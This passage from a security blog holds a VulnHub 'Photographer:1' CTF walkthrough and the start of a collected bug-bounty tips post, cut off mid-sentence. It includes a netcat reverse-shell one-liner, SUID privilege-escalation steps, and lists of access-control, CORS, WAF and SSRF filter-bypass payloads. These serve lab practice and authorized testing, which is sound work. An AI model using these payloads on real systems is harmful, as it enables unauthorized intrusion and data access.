Decode it and you will get an OpenSSH private key.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbDQDD61rV-SmPthyGTOiZ5Q3QeiFDHTNfx3RVJKb7-tCHKxUYDYWX1moBYjBf_6yfwPxoF9cYOWFAZdasrM_NdpKfHhk8t-Q0ChoBzyb1ilzTyhfoow0mu2fE9O_7vjL4DP-yDlYE7I/s773/base64+decode.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="692" data-original-width="773" height="716" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivbDQDD61rV-SmPthyGTOiZ5Q3QeiFDHTNfx3RVJKb7-tCHKxUYDYWX1moBYjBf_6yfwPxoF9cYOWFAZdasrM_NdpKfHhk8t-Q0ChoBzyb1ilzTyhfoow0mu2fE9O_7vjL4DP-yDlYE7I/w800-h716/base64+decode.PNG" width="800" /></a></div><div><br /></div><div>4. Save the decoded data in a text file. 
Use the following command to connect on port 22.<br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kuq4A8yWg3h2cYJWXIgKqdc1bPclB7A91ZXFxpd7nzr3oXvPYjXFYGQ_9LXHfFcBlRShZtrzjlQ07g-ljhpIV5fGl_sY4z9YXIQkpiojsqcQ6kN_JETEDl9T6QJ5hYxmjj86Jt-Ofg4/s998/ssh.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="998" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kuq4A8yWg3h2cYJWXIgKqdc1bPclB7A91ZXFxpd7nzr3oXvPYjXFYGQ_9LXHfFcBlRShZtrzjlQ07g-ljhpIV5fGl_sY4z9YXIQkpiojsqcQ6kN_JETEDl9T6QJ5hYxmjj86Jt-Ofg4/w800-h381/ssh.PNG" width="800" /></a></div><div><br /></div><div>5. Host a local server using Python and transfer LinEnum.sh to the target machine. 
After running LinEnum.sh, we noticed the SUID bit set on bash.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfHqrkioc-blZso2oYks30JKGUJNmFQJ2-oE3lBLgwLK8r2V8eoCa8BRmaXLomKG8e1qB6MGw8e8g6OlvfbVK4azDGZtTH0j0ci5uktk_9e9QZi3-TWJRe-W-jndwfaSU0DRLTM7XoP0/s633/SUID+bash.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="74" data-original-width="633" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfHqrkioc-blZso2oYks30JKGUJNmFQJ2-oE3lBLgwLK8r2V8eoCa8BRmaXLomKG8e1qB6MGw8e8g6OlvfbVK4azDGZtTH0j0ci5uktk_9e9QZi3-TWJRe-W-jndwfaSU0DRLTM7XoP0/w791-h93/SUID+bash.PNG" width="791" /></a></div><div><br /></div><div>6. After exploiting the SUID bash, we got our flag.txt in the root directory.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6C3NpYKSbIP8C_P_TrKvfAjLZSNdt0IEiuyPR67bb7PAa8yoy5ocQvHsGK013G6dWHt73KLHj853CGrRzPCzYcOILL4ozMFxwwfmtUZ2fIpVJ_f6ISkx0YCSUggVaq49PhyphenhyphenOA9fOz7vw/s1374/bash+suid.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="157" data-original-width="1374" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6C3NpYKSbIP8C_P_TrKvfAjLZSNdt0IEiuyPR67bb7PAa8yoy5ocQvHsGK013G6dWHt73KLHj853CGrRzPCzYcOILL4ozMFxwwfmtUZ2fIpVJ_f6ISkx0YCSUggVaq49PhyphenhyphenOA9fOz7vw/w800-h91/bash+suid.PNG" width="800" /></a></div><div><br /></div><div>Now, submit your flag on the Discord server. 
<br /></div><div>Link: <a href="https://discord.gg/RRgKaep">https://discord.gg/RRgKaep</a></div><div><br /></div><div>Thanks for reading till the end! 😊<br /></div>Latish Danawale (2020-08-06): Photographer:1 Walkthrough - VulnHub<div>This machine was developed to prepare for OSCP. It is a boot2root challenge. Let's begin!</div><div><br /></div><div>Target IP: 10.0.2.11</div><div><br /></div><div>1. Results of the nmap scan. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpjUUyk801Fi-qFgWIZDtGZ1Dh2wm0kMncQjoDESmaPoDRS5cTYY2XG_6ynMq7f9n0dz9TjaVorEsgRUx7T_1DNeOKf9VSs6cebPSEGN39xIGZZAMD3rekPdCpWKUwpjKRuhpfbXMq13Q/s975/nmap.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="429" data-original-width="975" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpjUUyk801Fi-qFgWIZDtGZ1Dh2wm0kMncQjoDESmaPoDRS5cTYY2XG_6ynMq7f9n0dz9TjaVorEsgRUx7T_1DNeOKf9VSs6cebPSEGN39xIGZZAMD3rekPdCpWKUwpjKRuhpfbXMq13Q/w800-h353/nmap.PNG" width="800" /></a></div><div>2. We noticed that an HTTP service is running on ports 80 and 8000, and Samba smbd on 445.</div><div><br /></div><div>3. 
Let's visit port 80.</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGe4Cn6W9HZpbDtT2kIN70s8HTvjX7eRhwkr4gNdKPVMuNgjyKhvhQIFBFeRMw_3bWCh2MdJnRswb0hwllJIz7veb735ebpWBo-hK-r_1s7MduL8GU2c1bRd_bPxvcqDrZHli812kqkw/s1917/blog.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="879" data-original-width="1917" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHGe4Cn6W9HZpbDtT2kIN70s8HTvjX7eRhwkr4gNdKPVMuNgjyKhvhQIFBFeRMw_3bWCh2MdJnRswb0hwllJIz7veb735ebpWBo-hK-r_1s7MduL8GU2c1bRd_bPxvcqDrZHli812kqkw/w800-h366/blog.PNG" width="800" /></a></div><div>4. After performing directory fuzzing we didn't find anything sensitive. It's time to explore the next port, 8000. The bottom of the page discloses the CMS name, Koken. Koken CMS is vulnerable to an authenticated RCE, but in order to exploit it we will require admin credentials. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd5kIb9xkFKEf6NchHtYGxket3L00pHuOz3GiSQLnKQJVFtfY99KPD7V02Q_RyekHuiFS0tvi67fjp03n_Lplih9f1KbSf5c8MaJuV6hVkZq2MtC_zMeVj_zwRG35xoBzBwBFLYq3QLpE/s1920/port+8000.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="591" data-original-width="1920" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd5kIb9xkFKEf6NchHtYGxket3L00pHuOz3GiSQLnKQJVFtfY99KPD7V02Q_RyekHuiFS0tvi67fjp03n_Lplih9f1KbSf5c8MaJuV6hVkZq2MtC_zMeVj_zwRG35xoBzBwBFLYq3QLpE/w800-h246/port+8000.PNG" width="800" /></a></div><div><br /></div><div>5. Wfuzz gave us the /admin/ directory, through which we can log in. 
Creds are still required :(</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMsi9s35jotNWnyNWaNVYl5TxdJzjf31l-WCOhbWkpiqCKqB18NyLIoubDmYM890-s8sySOxuq0uisN25QGSMynIE9-AdOxCs7_jhbDaF6-BGxCEEz9YTpPR6rvQUcPvH22MLk5CM89U/s1617/wfuzz.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="729" data-original-width="1617" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVMsi9s35jotNWnyNWaNVYl5TxdJzjf31l-WCOhbWkpiqCKqB18NyLIoubDmYM890-s8sySOxuq0uisN25QGSMynIE9-AdOxCs7_jhbDaF6-BGxCEEz9YTpPR6rvQUcPvH22MLk5CM89U/w800-h361/wfuzz.PNG" width="800" /></a></div><div><br /></div><div>6. Now we can connect to the SMB share on port 445. After connecting we noticed two files. <br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjdy02TMMKI9zVZrH8QY3yV6IWKsfKeEh_MpLrcYZf5tHL32rHoH9W6vmeWA587zPyACbZSzjvI5AnFB2XDVFowmyNQiuQP7CkSXig6oe1BmYeWO4IAljPdeg5m5ftBZa_LbsAKvVbOpk/s847/smb+connect.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="208" data-original-width="847" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjdy02TMMKI9zVZrH8QY3yV6IWKsfKeEh_MpLrcYZf5tHL32rHoH9W6vmeWA587zPyACbZSzjvI5AnFB2XDVFowmyNQiuQP7CkSXig6oe1BmYeWO4IAljPdeg5m5ftBZa_LbsAKvVbOpk/w800-h196/smb+connect.PNG" width="800" /></a></div><div><br /></div><div>7. 
The mailsent.txt file reveals user Daisa's email address and hints at a secret, "babygirl", which can be used as the password to log in to the Koken application.<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJoDmzC7pdFz6lOP5l1W2WsK8VdCu_IetTIqbpjRFhV81VDn1EZI5V3uB_GLgbbZuaCUIQLHqaxG4W5nT53EmWTac0lmgld4vyIvZLrnERR5uOeTIspHvzNeAFi6BG5-Kvs_XhKiwr08Q/s988/Mail+hint+babygirl+password.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="290" data-original-width="988" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJoDmzC7pdFz6lOP5l1W2WsK8VdCu_IetTIqbpjRFhV81VDn1EZI5V3uB_GLgbbZuaCUIQLHqaxG4W5nT53EmWTac0lmgld4vyIvZLrnERR5uOeTIspHvzNeAFi6BG5-Kvs_XhKiwr08Q/w800-h235/Mail+hint+babygirl+password.PNG" width="800" /></a></div><div><br /></div><div>8. Success! Now we can log in to the Koken admin panel. After browsing to the Console section we noticed version 0.22.24, which is vulnerable to RCE.</div><div>Exploit Link: <a href="https://www.exploit-db.com/exploits/48706">https://www.exploit-db.com/exploits/48706</a><br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGg7icFe0bGjErNVN-FBMF2-0bFyVkZMXWicovncf-lTrxN-l5ZIsS_s9pF5e7Vs58V-3HG1b4xroUHWCnTq74Tth6-Lput1V-bp8rxvvrP-USIT2HRkXXOqpqxBvRzCE8qjrrHYezWj8/s1918/koken+version.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="596" data-original-width="1918" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGg7icFe0bGjErNVN-FBMF2-0bFyVkZMXWicovncf-lTrxN-l5ZIsS_s9pF5e7Vs58V-3HG1b4xroUHWCnTq74Tth6-Lput1V-bp8rxvvrP-USIT2HRkXXOqpqxBvRzCE8qjrrHYezWj8/w800-h249/koken+version.PNG" width="800" /></a></div><div>9. 
After successful exploitation you will get a shell.</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhveZba9ZDZ_4fpqJ4_e9Qt5ZPxAQpcF9vPagzSiSrP9ivtC2_cg2OaDJrfBPSoBI4M9r9sOKoyGYch_DSEOGHFe-cbRotNaQwj_UNgzb7ZDPgS2M8214Aa9JsBJv9JcpxZAV_6jtcx9L0/s1919/Shell+uploaded.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="131" data-original-width="1919" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhveZba9ZDZ_4fpqJ4_e9Qt5ZPxAQpcF9vPagzSiSrP9ivtC2_cg2OaDJrfBPSoBI4M9r9sOKoyGYch_DSEOGHFe-cbRotNaQwj_UNgzb7ZDPgS2M8214Aa9JsBJv9JcpxZAV_6jtcx9L0/w1000-h69/Shell+uploaded.PNG" width="1000" /></a></div><div><br /></div><div>10. Use the following one-liner to receive a reverse shell on your system.</div><div><pre>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f<br /></pre><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc71Ih7VJh-pm0FDQBcT9ZR_nKLzhSHBbg_qgLvqbMYKW_6vcl5z_9YFIBlX8xqn9lq8SbZtAWYp1STX5mn63jdAGoujTmv5t6mjsgnWtRa48IcEXbkSE4LWF1OhsZ1bNeapfEMIbJ5Js/s1923/reverse+connection+burp.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="617" data-original-width="1923" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc71Ih7VJh-pm0FDQBcT9ZR_nKLzhSHBbg_qgLvqbMYKW_6vcl5z_9YFIBlX8xqn9lq8SbZtAWYp1STX5mn63jdAGoujTmv5t6mjsgnWtRa48IcEXbkSE4LWF1OhsZ1bNeapfEMIbJ5Js/w1000-h320/reverse+connection+burp.PNG" width="1000" /><br /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix2Hnex92mDHt2F50FrELnnC1F2DNWOoZx0565COuDGv99cGR2jOek3Pv-HLce0wThNsQifzaPuB6HmRZWTWduSdhInnC28FVtlBqpK2ILBwOW9iPZjIsDvoR55MQLMfqlrMSBd3LItVs/s663/reverse+connection+burp+1.PNG" 
imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="185" data-original-width="663" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix2Hnex92mDHt2F50FrELnnC1F2DNWOoZx0565COuDGv99cGR2jOek3Pv-HLce0wThNsQifzaPuB6HmRZWTWduSdhInnC28FVtlBqpK2ILBwOW9iPZjIsDvoR55MQLMfqlrMSBd3LItVs/w640-h179/reverse+connection+burp+1.PNG" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">11. We can read user.txt now!</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH8Wgdo7jJ_HOvUdfOHutICiQs3vfvjmzOoGJdMiF3VE7Ej4ziVLpUm1ZsBQ2VNc2Pu2fmQZzD0zp2WylqKwFz3iUlZKPPdsIl6Dyuk6DUqGmQNpWoUF1Z2xVp-YHs2wqucaUJNk_JARE/s651/user+flag+done.png" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="251" data-original-width="651" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH8Wgdo7jJ_HOvUdfOHutICiQs3vfvjmzOoGJdMiF3VE7Ej4ziVLpUm1ZsBQ2VNc2Pu2fmQZzD0zp2WylqKwFz3iUlZKPPdsIl6Dyuk6DUqGmQNpWoUF1Z2xVp-YHs2wqucaUJNk_JARE/w640-h247/user+flag+done.png" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">12. 
Running LinEnum.sh reveals that the SUID bit is set on the php binary, so anything php executes runs with the file owner's (root's) effective UID.</div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPceYKvJ5rY2oCUku21K0RuMDRTQ-CkQB678RoHZLPf9O9YPNeYHaPyG7cTeaHF8UWtrxzXye3hnso41E4T7mfDyeEUH3SDq1aAFrW_8cmITS68A2wR_B1HZLM-tNKePs6N4cgEWrAT0/s935/SUID+php.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="465" data-original-width="935" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPceYKvJ5rY2oCUku21K0RuMDRTQ-CkQB678RoHZLPf9O9YPNeYHaPyG7cTeaHF8UWtrxzXye3hnso41E4T7mfDyeEUH3SDq1aAFrW_8cmITS68A2wR_B1HZLM-tNKePs6N4cgEWrAT0/w800-h398/SUID+php.PNG" width="800" /><br /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">13. Used <a href="https://gtfobins.github.io/">GTFOBins</a> for reference: its SUID entry for php uses pcntl_exec to replace the php process with /bin/sh -p, where -p tells the shell to keep the elevated effective UID instead of dropping back to the real one (the pcntl extension has to be available for this to work).<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI9K8PZWVrpRhjSpRhSW9rC6w6uL0aMs-Cf83Vxz8Xue6_LPZWQXWpAG_7q5WjaauLkL7IlxN-TFNHstj8ViV6qhx8prQNll0r23evFmhG_mtBLJd_GNCrgFWRYWtOyWnTx6058Fum0Jg/s1038/SUID.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="370" data-original-width="1038" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI9K8PZWVrpRhjSpRhSW9rC6w6uL0aMs-Cf83Vxz8Xue6_LPZWQXWpAG_7q5WjaauLkL7IlxN-TFNHstj8ViV6qhx8prQNll0r23evFmhG_mtBLJd_GNCrgFWRYWtOyWnTx6058Fum0Jg/s640/SUID.PNG" width="640" /></a></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;">14. 
Rooted successfully!!!!<br /></div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9z-EahnsBTmRO5Fw0eIgRf5B_riAHnh-Nfl7qlz0wE8IhCLhgHIfqlCyNCGh5xRiAJJgvZus3t7HOAvWWgcY2UuJNpS7Yalggs5NyglgjylLlcE2STkpc3O7GBosqfEYEHylC3Be1iQ/s784/Rooted+Machine.PNG" imageanchor="1" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="784" data-original-width="680" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE9z-EahnsBTmRO5Fw0eIgRf5B_riAHnh-Nfl7qlz0wE8IhCLhgHIfqlCyNCGh5xRiAJJgvZus3t7HOAvWWgcY2UuJNpS7Yalggs5NyglgjylLlcE2STkpc3O7GBosqfEYEHylC3Be1iQ/w555-h640/Rooted+Machine.PNG" width="555" /></a></div><div class="separator" style="clear: both;">Thanks for reading! 😄<br /></div></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-8525808753272436082020-07-28T16:49:00.003-07:002020-08-02T08:18:52.591-07:00#Bugbountytips<h3 style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcH7osrDFIYCjUbSElDijrhyOlIp4JS2ivG609U2HADv3uDmjBb-vGCemY9NmNehD-ugwmH1T_Da71DIKpYNz7wElaJumeGPrJwI6CkJsbdInhkk_LxDwDY3yhVfBU5rtSKBQ4lk1eAmo/s300/download.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="300" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcH7osrDFIYCjUbSElDijrhyOlIp4JS2ivG609U2HADv3uDmjBb-vGCemY9NmNehD-ugwmH1T_Da71DIKpYNz7wElaJumeGPrJwI6CkJsbdInhkk_LxDwDY3yhVfBU5rtSKBQ4lk1eAmo/w375-h210/download.jpg" width="375" /></a></div></h3><h3 style="text-align: left;"><span style="font-weight: normal;">Before you start reading this post, let me tell you that all the tips are collected from Twitter (a few are mine 😓), where awesome community folks share their knowledge and experience. 
I have tried to mention every Twitter handle the tips were taken from; if your name is missing, please reach out to me. 😉</span></h3><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><h3 style="text-align: left;"><font color="#ff0000">Authentication</font></h3><div># Access control checks done on the request path by a front-end (reverse proxy, WAF) can sometimes be bypassed with the X-Original-URL header, which some back-ends treat as the real path to route:</div><div>POST /admin/deleteUser HTTP/1.1 -> 403</div><div><br /></div><div>POST / HTTP/1.1 </div><div>X-Original-URL: /admin/deleteUser -> 200OK </div><div><br /></div><div>Bypass Success!</div><div><br /></div><div># Accessing the Admin Panel</div><div>https://target.com/admin/ - 302</div><div>https://target.com/admin..;/ - 200</div><div><br /></div><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000">IDOR</font></span></h3><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># Suppose you find the endpoint </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">GET /api_v1/messages?user_id=Your_user_id</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Try</span></div><div>"GET /api_v1/messages?user_id=Another_user_id"</div><div>"GET /api_v1/messages?user_id=Your_user_id&user_id=another_user_id"</div><div>"GET /api_v1/messages?user_id=another_user_id&user_id=Your_user_id"</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">CORS</font></h3><div># CORS Protection RegEx Bypass</div><div>If the target only allows the main domain and its subdomains, the allow-list is often a regex; try prepending something to the main domain and see whether it is still matched:</div><div><br /></div><div>Origin: target.com --> Access-Control-Allow-Origin: target.com</div><div>Origin: eviltarget.com --> Not Vulnerable</div><div>Origin: sub.eviltarget.com --> Access-Control-Allow-Origin: sub.eviltarget.com</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">SQL Injection</font></h3><div># If you are ever stuck on SQLi behind an IP-based WAF</div><div>1. Use the IP Rotate extension in Burp, configured with AWS credentials (it sends each request through a different API Gateway source IP)</div><div>2. Use sqlmap with the --proxy flag to route traffic via Burp</div><div>3. Bypass+1 Exploit+1 </div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">RCE</font></h3><div># Handy as hell tip for checking which functions are disabled in PHP (and therefore which execution primitives you still have, or need to bypass) </div><div><?php var_dump(explode(',',ini_get('disable_functions'))); ?></div><div><br /></div><div># <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Parse </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/hF4tw8MSp2?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://cvedetails.com"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>cvedetails.com</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> for scores 6+ going back 3 years for vulns. Visit the reference pages for web vulns in this filter. Grab the paths for those vulns. 
Build your own RCE word list.</span></div><h3 style="text-align: left;"><br /><font color="#ff0000">SSRF</font></h3><div># Bypass a blocked localhost IP on SSRF</div><div>Create a subdomain you control and resolve it to 127.0.0.1: the filter usually checks the hostname string, not what it resolves to. </div><div>You can also use a PortSwigger subdomain that already resolves to localhost: spoofed.burpcollaborator.net </div></div><div><br /></div><div># One-liner commands (both manual & automatic)</div><div><br /></div><div>Automatic One Liner SSRF:</div><div>assetfinder --subs-only target | httprobe | gau | gf ssrf | nuclei -t nuclei-templates/vulnerabilities/microstrategy-ssrf.yaml -o result.txt</div><div><br /></div><div>Manual testing SSRF:</div><div>assetfinder --subs-only target | httprobe | gau | gf ssrf | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk 2>/dev/null</div><div><br /></div><div>Then use Burp Collaborator to confirm the SSRF out of band.</div><div><br /></div><div># Using the decimal form of an IP to bypass a blacklisted '.' character</div><div>Google IP: 216.58.212.110</div><div>Google IP Decimal: 3627734126</div><div>Example: target.com?redirect=http://3627734126 - Done</div><div><br /></div><div># Bypassing SSRF with CIDR (the whole 127.0.0.0/8 block is loopback, not just 127.0.0.1)</div><div>http://127.127.127.127</div><div>http://127.0.0.1</div><div><br /></div><div># Bypass using rare address forms</div><div>http://127.1</div><div>http://0/</div><div><br /></div><div># Bypass using a combination of tricks (different parsers pick different hosts out of this)</div><div>http://1.1.1.1 &@2.2.2.2# @3.3.3.3/</div><div>urllib : 3.3.3.3</div><div><br /></div><div># Bypass against a weak parser</div><div>http://127.1.1.1:80\@127.2.2.2:80/</div><div><br /></div><div># Bypass localhost with [::]</div><div>http://[::]:80/</div><div>http://0000::1:80/</div><div><br /></div><div># Sentry Blind SSRF</div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1. cat aquatone/*/urls.txt | grep sentry </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. 
Open the Sentry request in Burp Suite </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. Send it to Repeater </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4. Change the value of filename: to a </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/Zgp9fnpA7G?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://postb.in"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>postb.in</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> URL (or similar) </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">5. Wait for a connection </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>See a target running on Nginx?</div><div>GET @xx<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">.collab.net/ or </span><a class="r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0 css-4rbku5 css-18t94o4 css-901oao css-16my406" data-focusable="true" dir="ltr" href="https://t.co/tU2OIGqyzz?amp=1" rel="noopener noreferrer" role="link" target="_blank" title="http://xxx.collaborator.net/"><span aria-hidden="true" class="css-901oao css-16my406 r-1qd0xha r-hiw28u r-ad9z0x r-bcqeeo r-qvutc0">http://</span>xxx.collaborator.net</a><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"> HTTP/1.1 </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Host: 
target[.]com </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Always try an absolute URL as the request target: some servers and proxies use it, rather than the Host header, to decide where the request goes. This has been affecting many apps; old is gold for SSRF.</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>A small Burp Suite trick which helped me find blind SSRF</div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1: Use Intruder to brute force headers </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2: Add a Burp Collaborator URL as the value. </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3: Add a numeric prefix payload (Pitchfork attack) so each Collaborator hit can be matched back to the header that triggered it </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4: Use the Taborator extension to monitor hits</span></div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Security Misconfiguration</font></h3><div># Easy way to find exposed production code: </div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1. Find a GitLab-hosted subdomain, usually named “code.domain” or “gitlab.domain” </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. Even if login is required, try the
